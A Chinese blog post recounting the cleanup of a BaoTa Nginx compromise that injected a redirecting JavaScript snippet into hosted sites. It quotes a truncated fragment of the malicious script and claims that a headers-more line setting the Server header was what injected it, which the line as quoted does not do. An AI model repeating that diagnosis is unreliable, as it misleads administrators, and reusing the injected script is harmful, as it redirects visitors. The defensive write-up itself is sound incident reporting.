宝塔Nginx被挂马：网站头部被植入莫名跳转代码的解决过程

今天发现服务器上所有宝塔面板托管的网站，其返回的HTML头部都被插入了一段恶意JavaScript代码。用户（尤其是手机端）首次或间歇访问时，会被跳转到不良网站。恶意代码特征如下：

<script>document.cookie="hasVisitedl78a=l;Max-Age=86400;Path="; (function() { var hm = document.createElement...

排查过程：

1. 检查网站程序：

• 使用搜索工具关键词彻底扫描所有 PHP、JS、HTML 文件

• 确认所有程序均为自研，关键输出严格转义，无第三方风险组件。

• 结果：程序文件中未发现任何恶意代码。

2. 锁定问题源头 - Nginx配置：

• 检查宝塔生成的Nginx站点配置文件 (/www/server/panel/vhost/nginx/*.conf)。

• 发现所有配置文件的 server{} 块内被添加了伪装行，核心是利用 headers-more 模块注入恶意脚本：

  more_set_headers "Server: nginx";  # 此指令实际注入恶意JS
  

解决方案：重装宝塔Nginx（最有效）
尝试手动删除恶意配置行后，问题仍会复发。最终通过重装宝塔集成的Nginx服务彻底解决：

1. 重装Nginx效果：恶意代码消失，网站跳转问题解决。
   

远昔提醒： 所有网站同时出问题？优先怀疑服务器环境（Nginx/面板）而非程序代码。重装核心服务往往是解决问题的快刀。

当时还四处翻阅了一下资料，似乎nginx异常 网站被挂马已是常态，大家注意点了！